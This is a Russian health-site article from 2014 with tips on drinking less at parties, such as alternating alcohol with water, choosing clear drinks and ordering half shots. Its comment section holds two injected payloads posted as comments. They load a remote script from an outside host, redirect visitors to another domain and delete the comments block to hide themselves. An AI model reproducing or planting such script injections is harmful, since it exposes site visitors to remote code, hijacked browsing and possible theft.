Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как не напиться  >>  Как не напиться
 
Обратная связь
 

Как не напиться

Размер шрифта
17 января 2014 00:00
  • google_analytics: false
  • Нравится

Пытаетесь следить за обхватом талии, но, тем не менее, за время продолжительных новогодних праздников отмечали вовсю?

Как не напиться

Мы только за веселье и вечеринки, но обильные застолья плохо отражаются не только на вашей талии, но и на печени и общем здоровье организма. К тому же, праздники всегда сменяются рабочими буднями. Несколько простых секретов, которые помогут вам не попасть впросак на следующей вечеринке, вы можете узнать из нашей статьи.

Чередуйте с водой

Чередование алкогольного напитка и воды – это верный и проверенный способ уменьшить негативное воздействие алкоголя и избежать обезвоживания, а также предотвратить похмелье. После каждого алкогольного напитка (в крайнем случае, после каждого второго) подходите к барной стойке и заказывайте стакан воды. Не стоит этого стесняться: вы просто хотите пить, а алкогольный напиток закажите следующим. И обязательно убедитесь в том, что вы допили воду, а голова по-прежнему ясная.

Отдавайте предпочтение прозрачным напиткам

Прозрачные напитки, такие как водка или джин, выглядят так же, как и растаявший лед. Поэтому если ваш напиток уже закончился, а вы знаете, что вам нужно сделать паузу, вы можете бросить пару кубиков льда в ваш стакан, и никто не будет пытаться налить вам еще стаканчик.

Заказывайте напитки, которые выглядят как алкогольные

Это еще одно преимущество прозрачных напитков. Например, водка с газировкой и лаймом выглядит точно так же, как и просто газировка с лаймом. К тому же, такой напиток не содержит сахара. Вы легко сможете чередовать алкогольную версию данного коктейля с безалкогольной.

Будьте забывчивы

На шумной вечеринке «забывайте» ваш стакан, когда он становится наполовину пустым. Вы можете «случайно» оставить ваш напиток в ванной комнате, за барной стойкой, на журнальном столике – в общем, в любом удобном месте, которое не привлекает внимания. А когда вам дадут следующий напиток, вы, в итоге, выпьете вполовину меньше, чем остальные. 

Пейте светлое пиво

Если вы любитель пива и все эти разговоры о водке с газировкой заставляют вас морщиться, то не беспокойтесь, этот совет как раз для вас.  Пиво принято считать легким напитком, и хотя светлые сорта пива содержат всего 4 градуса, некоторые сорта темного бельгийского пива могут содержать и 10 градусов! Поэтому если вы хотите оставаться на коне как можно дольше, то отдавайте предпочтение светлому пиву. Если же вам категорически не нравится его вкус, то попробуйте добавить дольку лайма – это должно исправить ситуацию.

Любители шотов

Кажется, что шот – это безобидная, маленькая порция алкоголя, но, тем не менее, это впечатление весьма обманчиво, так как вы и сами не заметите, как быстро опьянеете. В данном случае можно позаимствовать небольшую хитрость у барменов: пьяные посетители баров часто думают, что в лице бармена они нашли нового лучшего друга и готовы угощать его выпивкой в течение всей ночи. Чтобы избежать опьянения на работе, бармены держат под рукой полупустую кружку пива и делают вид, что пьют с вами, а на самом деле сплевывают в эту кружку. Если вы видите, что ваши друзья увлеклись шотами, то можете смело использовать этот трюк, чтобы не опьянеть в два счета.  

Опоздайте на вечеринку

Еще один из способов избежать обильных возлияний – это опоздать на вечеринку. На самом деле, ведь если вы придете на 45 минут или на час позже, то ваши друзья и приятели уже успеют выпить, следовательно, и захмелеют они раньше.

Заказывайте половину рюмки

Если вы сами заказываете себе напитки, но не любите ни пиво, ни коктейли, то оптимальным вариантом для вас станет заказывать половину шота. Таким образом, вы будете и веселиться с друзьями, и не заработаете себе похмелье. 

Ну, а все о том, как заботиться о печени в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что нельзя есть с больной печенью   Как выпить и защитить печень   Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как понять, что вы пьете много?
Самые неожиданные факты о похмелье
Что алкоголь делает с печенью

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.